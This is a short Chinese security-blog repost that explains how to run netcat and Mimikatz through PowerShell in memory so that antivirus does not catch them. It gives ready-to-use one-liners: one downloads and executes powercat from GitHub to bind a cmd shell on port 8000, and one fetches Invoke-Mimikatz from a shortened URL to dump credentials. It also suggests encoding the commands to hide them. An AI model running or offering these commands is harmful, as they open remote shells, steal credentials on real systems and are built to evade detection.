powershell运行netcat

admin 2022年4月1日11:23:03安全文章评论41 views525字阅读1分45秒阅读模式

前言


大家都知道,powershell可以做到在内存中加载运行文件,做到无文件在硬盘上生成。


正文


渗透中大家常用的技巧比如nc监听、mimikatz密码抓取等,今天给大家介绍下利用ps执行nc做到变相免杀。


ps版nc链接如下:


https://github.com/besimorhino/powercat


可以本地执行,也可以远程执行,远程执行命令如下:


powershell "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -l -p 8000 -e cmd"


powershell运行netcat


然后远程连接执行命令即可

powershell运行netcat


当然,如果嫌弃该命令太暴露,可以对其进行编码


powershell运行netcat


mimikatz密码抓取同理


powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"


原文始发于微信公众号(中国白客联盟):powershell运行netcat

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月1日11:23:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  powershell运行netcat http://cn-sec.com/archives/783546.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: